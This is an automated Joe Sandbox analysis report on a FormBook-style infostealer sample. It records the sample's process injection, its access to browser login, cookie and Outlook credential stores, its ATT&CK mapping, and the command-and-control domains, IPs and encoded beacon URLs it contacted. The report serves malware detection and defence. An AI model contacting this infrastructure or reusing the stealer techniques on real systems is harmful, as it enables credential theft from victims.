Jump to behavior

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A4B106 LogonUserW,

0_2_00A4B106

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A13D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00A13D19

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A5411C SendInput,keybd_event,

0_2_00A5411C

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A574BB mouse_event,

0_2_00A574BB

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\bIcqeSVPW6.exe"	Jump to behavior
Source: C:\Program Files (x86)\myQbSftdwEqKuKFheLSLOqpwscXkIWxoOttmJDSRdlEDCWDkSiFOFVFeKHqPUMgdQScaWv\qcjVHvcmgHQ.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

0_2_00A4A66C

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A571FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00A571FA

Source: bIcqeSVPW6.exe, qcjVHvcmgHQ.exe, 00000004.00000002.3319037421.0000000000D80000.00000002.00000001.00040000.00000000.sdmp, qcjVHvcmgHQ.exe, 00000004.00000000.1623601606.0000000000D81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: qcjVHvcmgHQ.exe, 00000004.00000002.3319037421.0000000000D80000.00000002.00000001.00040000.00000000.sdmp, qcjVHvcmgHQ.exe, 00000004.00000000.1623601606.0000000000D81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: qcjVHvcmgHQ.exe, 00000004.00000002.3319037421.0000000000D80000.00000002.00000001.00040000.00000000.sdmp, qcjVHvcmgHQ.exe, 00000004.00000000.1623601606.0000000000D81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: bIcqeSVPW6.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: qcjVHvcmgHQ.exe, 00000004.00000002.3319037421.0000000000D80000.00000002.00000001.00040000.00000000.sdmp, qcjVHvcmgHQ.exe, 00000004.00000000.1623601606.0000000000D81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A365C4 cpuid

0_2_00A365C4

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A6091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_00A6091D

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A8B340 GetUserNameW,

0_2_00A8B340

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A41E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00A41E8E

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe

Code function: 0_2_00A2DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00A2DDC0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1702544011.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3319370482.0000000005630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3319323904.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3324169649.0000000006CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3318079583.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1703561585.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1703177843.0000000002D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3319443230.0000000003870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\chkdsk.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: bIcqeSVPW6.exe	Binary or memory string: WIN_81
Source: bIcqeSVPW6.exe	Binary or memory string: WIN_XP
Source: bIcqeSVPW6.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: bIcqeSVPW6.exe	Binary or memory string: WIN_XPe
Source: bIcqeSVPW6.exe	Binary or memory string: WIN_VISTA
Source: bIcqeSVPW6.exe	Binary or memory string: WIN_7
Source: bIcqeSVPW6.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1702544011.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3319370482.0000000005630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3319323904.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3324169649.0000000006CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3318079583.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1703561585.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1703177843.0000000002D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3319443230.0000000003870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A68C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00A68C4F
Source: C:\Users\user\Desktop\bIcqeSVPW6.exe	Code function: 0_2_00A6923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00A6923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	251 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
bIcqeSVPW6.exe	83%	ReversingLabs	Win32.Trojan.AutoitInject
bIcqeSVPW6.exe	52%	Virustotal		Browse
bIcqeSVPW6.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.tempatmudisini06.click/l03t/?3DkHhn=+9BKYrTO+vJXrUQOGHL0VAaKc2zJijozXdE03+pH7bI8lw2q1SksIpXkrtcR3646NgDj8ak0/OWJjttr6L+cUN80K7t0/Vsr8uZoIlGR8251DEoyq21C4q4re5ntRuh1QQ==&jH4x=86JHl	0%	Avira URL Cloud	safe
http://www.dating-apps-az-dn5.xyz/8fw9/	0%	Avira URL Cloud	safe
http://www.tempatmudisini06.click/l03t/	0%	Avira URL Cloud	safe
http://www.7261ltajbc.bond/m36v/	0%	Avira URL Cloud	safe
http://www.7261ltajbc.bond/m36v/?3DkHhn=CFkAe3bFRt+WilFZUe5RqpuEyYe1T1ptTc7TrLcgXQSc7eL8d/sZYyILGDP2RZgGroaVNOLO4IzoQck32bc7MIdSPZAP+UMCVlLrdJlLVobFhTJLH0tY4N2Qcf3rQI4NHA==&jH4x=86JHl	0%	Avira URL Cloud	safe
http://www.soainsaat.xyz	0%	Avira URL Cloud	safe
http://www.mycleanupfiesta.live/jhf5/	0%	Avira URL Cloud	safe
http://www.rtpnagitavip.xyz/27lg/?jH4x=86JHl&3DkHhn=XHd59GHbUnAySavE+VYtb0oRW1QdwhWNcR79gJCiA4T47CJUdda4m3KOv2gLYrZW1RokSNrWwPitVihkA4IERdP5BfSklenz4vUF3jCdjthznzOB1JrNNJokaKrslHPJFg==	0%	Avira URL Cloud	safe
http://www.rtpnagitavip.xyz/27lg/	0%	Avira URL Cloud	safe
http://www.rafconstrutora.online/sa6l/	0%	Avira URL Cloud	safe
http://www.soainsaat.xyz/vivr/	0%	Avira URL Cloud	safe
http://www.windsky.click/pygh/	0%	Avira URL Cloud	safe
https://www.hostgator.com.br	0%	Avira URL Cloud	safe
http://m.yunlekeji.top/	0%	Avira URL Cloud	safe
https://login.lit	0%	Avira URL Cloud	safe
http://www.dating-apps-az-dn5.xyz/8fw9/?jH4x=86JHl&3DkHhn=gtoYIMxc4wYwq9NPYFjSszTDPRf8MDoa911P7+bnEwIzn/+NgM97Q9dqk2PkQokDelqcKS+c9CYn/WPq5HMlXHH5MMUCc4tUxwGXuy1eGCrmBFPJkxXRRohM9/tBd2Opyg==	0%	Avira URL Cloud	safe
http://www.yunlekeji.top/1e5v/?3DkHhn=LSevH1SlR8jKR63Sf3e6iJP8FgOuKv9VRJH5n/Y57ceZ6zxK2PAgiO3wYjZDkthnMdw+Rr81pHZPvK3KWmaSywZBPBYkXMXczB8dWZqH7PW/MoMlf4MIAK6HI0AhKSB4pw==&jH4x=86JHl	0%	Avira URL Cloud	safe
http://www.luxuryliving.website/m85b/	0%	Avira URL Cloud	safe
http://www.rafconstrutora.online/sa6l/?3DkHhn=6V1asWS7bHNCa/2zAtOgIvo5xGUX2YN7Fz16JDlX+WOPPCMQtYaavk317PXImbN/OUG48/wNZlwOwdeReLWvD6PYMjqtuTDNT7c8ZTd5cxBCZsjQlYSG4pUhurPexOX1dg==&jH4x=86JHl	0%	Avira URL Cloud	safe
http://www.luxuryliving.website/m85b/?3DkHhn=RTKlsIHwI0zh00zNoZz82n6YKC/FVn63bGL7eLxLdINoTiozmJDsVcxe+nKMoKClO37Gg1Am4qT+EilmX6Glt3+WO5cQJZz5qMzXuYr/wgoBbWBPZiwEopFeQ3Q/Mtz8GQ==&jH4x=86JHl	0%	Avira URL Cloud	safe
http://www.mycleanupfiesta.live/jhf5/?3DkHhn=X47VSHjA7Ra6hBgR1eJb6pHvwL8UYAxuv5evRVNTAMu+fw462P/7SsFxa6WZOMbinD7w009mibInuncktbKjofctyMBEnZDK39OjLQRAxIrXDibUuqiVHbgJGblCqHQhVA==&jH4x=86JHl	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
rtpnagitavip.xyz	172.96.191.238	true	true	unknown
www.windsky.click	46.253.5.221	true	false	unknown
fap-a13f5c64.faipod.com	165.154.96.210	true	false	unknown
www.dating-apps-az-dn5.xyz	199.59.243.228	true	false	high
www.mycleanupfiesta.live	104.21.38.192	true	false	unknown
www.rafconstrutora.online	104.21.32.1	true	false	high
tempatmudisini06.click	103.21.221.4	true	false	unknown
www.luxuryliving.website	209.74.77.109	true	false	unknown
www.7261ltajbc.bond	154.12.28.184	true	false	high
natroredirect.natrocdn.com	85.159.66.93	true	false	high
www.rtpnagitavip.xyz	unknown	unknown	true	unknown
www.tempatmudisini06.click	unknown	unknown	false	unknown
www.uynline.shop	unknown	unknown	false	unknown
www.yunlekeji.top	unknown	unknown	false	high
www.joube.shop	unknown	unknown	false	unknown
www.soainsaat.xyz	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.tempatmudisini06.click/l03t/?3DkHhn=+9BKYrTO+vJXrUQOGHL0VAaKc2zJijozXdE03+pH7bI8lw2q1SksIpXkrtcR3646NgDj8ak0/OWJjttr6L+cUN80K7t0/Vsr8uZoIlGR8251DEoyq21C4q4re5ntRuh1QQ==&jH4x=86JHl	false	Avira URL Cloud: safe	unknown
http://www.mycleanupfiesta.live/jhf5/	false	Avira URL Cloud: safe	unknown
http://www.tempatmudisini06.click/l03t/	false	Avira URL Cloud: safe	unknown
http://www.7261ltajbc.bond/m36v/	false	Avira URL Cloud: safe	unknown
http://www.rtpnagitavip.xyz/27lg/?jH4x=86JHl&3DkHhn=XHd59GHbUnAySavE+VYtb0oRW1QdwhWNcR79gJCiA4T47CJUdda4m3KOv2gLYrZW1RokSNrWwPitVihkA4IERdP5BfSklenz4vUF3jCdjthznzOB1JrNNJokaKrslHPJFg==	false	Avira URL Cloud: safe	unknown
http://www.rafconstrutora.online/sa6l/	false	Avira URL Cloud: safe	unknown
http://www.dating-apps-az-dn5.xyz/8fw9/	false	Avira URL Cloud: safe	unknown
http://www.7261ltajbc.bond/m36v/?3DkHhn=CFkAe3bFRt+WilFZUe5RqpuEyYe1T1ptTc7TrLcgXQSc7eL8d/sZYyILGDP2RZgGroaVNOLO4IzoQck32bc7MIdSPZAP+UMCVlLrdJlLVobFhTJLH0tY4N2Qcf3rQI4NHA==&jH4x=86JHl	false	Avira URL Cloud: safe	unknown
http://www.rtpnagitavip.xyz/27lg/	false	Avira URL Cloud: safe	unknown
http://www.windsky.click/pygh/	false	Avira URL Cloud: safe	unknown
http://www.luxuryliving.website/m85b/	false	Avira URL Cloud: safe	unknown
http://www.soainsaat.xyz/vivr/	false	Avira URL Cloud: safe	unknown
http://www.rafconstrutora.online/sa6l/?3DkHhn=6V1asWS7bHNCa/2zAtOgIvo5xGUX2YN7Fz16JDlX+WOPPCMQtYaavk317PXImbN/OUG48/wNZlwOwdeReLWvD6PYMjqtuTDNT7c8ZTd5cxBCZsjQlYSG4pUhurPexOX1dg==&jH4x=86JHl	false	Avira URL Cloud: safe	unknown
http://www.dating-apps-az-dn5.xyz/8fw9/?jH4x=86JHl&3DkHhn=gtoYIMxc4wYwq9NPYFjSszTDPRf8MDoa911P7+bnEwIzn/+NgM97Q9dqk2PkQokDelqcKS+c9CYn/WPq5HMlXHH5MMUCc4tUxwGXuy1eGCrmBFPJkxXRRohM9/tBd2Opyg==	false	Avira URL Cloud: safe	unknown
http://www.yunlekeji.top/1e5v/?3DkHhn=LSevH1SlR8jKR63Sf3e6iJP8FgOuKv9VRJH5n/Y57ceZ6zxK2PAgiO3wYjZDkthnMdw+Rr81pHZPvK3KWmaSywZBPBYkXMXczB8dWZqH7PW/MoMlf4MIAK6HI0AhKSB4pw==&jH4x=86JHl	false	Avira URL Cloud: safe	unknown
http://www.luxuryliving.website/m85b/?3DkHhn=RTKlsIHwI0zh00zNoZz82n6YKC/FVn63bGL7eLxLdINoTiozmJDsVcxe+nKMoKClO37Gg1Am4qT+EilmX6Glt3+WO5cQJZz5qMzXuYr/wgoBbWBPZiwEopFeQ3Q/Mtz8GQ==&jH4x=86JHl	false	Avira URL Cloud: safe	unknown
http://www.mycleanupfiesta.live/jhf5/?3DkHhn=X47VSHjA7Ra6hBgR1eJb6pHvwL8UYAxuv5evRVNTAMu+fw462P/7SsFxa6WZOMbinD7w009mibInuncktbKjofctyMBEnZDK39OjLQRAxIrXDibUuqiVHbgJGblCqHQhVA==&jH4x=86JHl	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.soainsaat.xyz	qcjVHvcmgHQ.exe, 00000004.00000002.3324169649.0000000006D1F000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://m.yunlekeji.top/	firefox.exe, 00000009.00000002.2002761848.000000003A464000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	qcjVHvcmgHQ.exe, 00000004.00000002.3322963977.00000000055E0000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3319945189.0000000006BC0000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3321444358.0000000008760000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.hostgator.com.br	qcjVHvcmgHQ.exe, 00000004.00000002.3322963977.0000000004E06000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000005.00000002.3319945189.00000000063E6000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.lit	chkdsk.exe, 00000005.00000002.3318382305.0000000005411000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	chkdsk.exe, 00000005.00000003.1896248605.000000000A25D000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
46.253.5.221	www.windsky.click	Bulgaria	44814	BTEL-BG-ASBG	false
103.21.221.4	tempatmudisini06.click	unknown	9905	LINKNET-ID-APLinknetASNID	false
209.74.77.109	www.luxuryliving.website	United States	31744	MULTIBAND-NEWHOPEUS	false
165.154.96.210	fap-a13f5c64.faipod.com	Canada	7456	INTERHOPCA	false
172.96.191.238	rtpnagitavip.xyz	Canada	59253	LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG	true
104.21.32.1	www.rafconstrutora.online	United States	13335	CLOUDFLARENETUS	false
154.12.28.184	www.7261ltajbc.bond	United States	174	COGENT-174US	false
104.21.38.192	www.mycleanupfiesta.live	United States	13335	CLOUDFLARENETUS	false
199.59.243.228	www.dating-apps-az-dn5.xyz	United States	395082	BODIS-NJUS	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589079
Start date and time:	2025-01-11 09:20:22 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	bIcqeSVPW6.exe renamed because original name is a hash value
Original Sample Name:	27bc352c485ac59da456735b5418f08abd0d606ef69e4b18b4a720fe9074b1e7.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@13/10
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 48 Number of non-executed functions: 296
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
46.253.5.221	ZcshRk2lgh.exe	Get hash	malicious	FormBook	Browse	www.windsky.click/gybb/
	BcF3o0Egke.exe	Get hash	malicious	FormBook	Browse	www.windsky.click/gybb/
	5CTbduoXq4.exe	Get hash	malicious	FormBook	Browse	www.windsky.click/3jkd/
	file.exe	Get hash	malicious	FormBook	Browse	www.windsky.click/gybb/
103.21.221.4	ZcshRk2lgh.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini06.click/4iun/
	BcF3o0Egke.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini06.click/4iun/
	rPaymentAdviceNote_pdf.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini06.click/0kli/
	file.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini06.click/4iun/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini06.click/0kli/
	FOTO#U011eRAFLAR.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini06.click/kfzf/
	Z6s208B9QX.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini01.click/abla/
	-pdf.bat.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini01.click/iydt/
	UMOWA_PD.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.tempatmudisini01.click/iydt/
	RFQ - HTS45785-24-0907I000.exe	Get hash	malicious	FormBook	Browse	www.tempatmudisini01.click/abla/
209.74.77.109	ZcshRk2lgh.exe	Get hash	malicious	FormBook	Browse	www.moviebuff.info/4r26/
	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.greenthub.life/r3zg/
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	www.greenthub.life/r3zg/
	BcF3o0Egke.exe	Get hash	malicious	FormBook	Browse	www.moviebuff.info/4r26/
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	www.dailyfuns.info/n9b0/?F4=Q0yHy&xP7x=A8VrqyfvUbO/Hw2LPQ1UsX5BwNVpcsHZj5dGp0FbdWJo87i+fAzGqY/WbkPjYDkNrmWhazG0hIjSjfnpkftd6thTTSLohUKEi8xodPTyp3tNekr0IM36mEI=
	Invoice 10493.exe	Get hash	malicious	FormBook	Browse	www.dailyfuns.info/n9b0/?IUY=A8VrqyfvUbO/Hw2LPQ4NsXlD/s5AVNHZj5dGp0FbdWJo87i+fAzGqYzWbkPjYDkNrmWhazG0hIjSjfnpkftd/stSTEWpskOuncpocPTypnt0UF6pA8n7oU4=&h7i-=tZtx
	Document_084462.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.greenthub.life/r3zg/?ChhG6=J-xs&2O=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc=
	Proforma invoice - Arancia NZ.exe	Get hash	malicious	FormBook	Browse	www.greenthub.life/r3zg/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.dailyfuns.info/n9b0/
	W3MzrFzSF0.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.gogawithme.live/6gtt/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.dating-apps-az-dn5.xyz	bkTW1FbgHN.exe	Get hash	malicious	FormBook	Browse	199.59.243.228
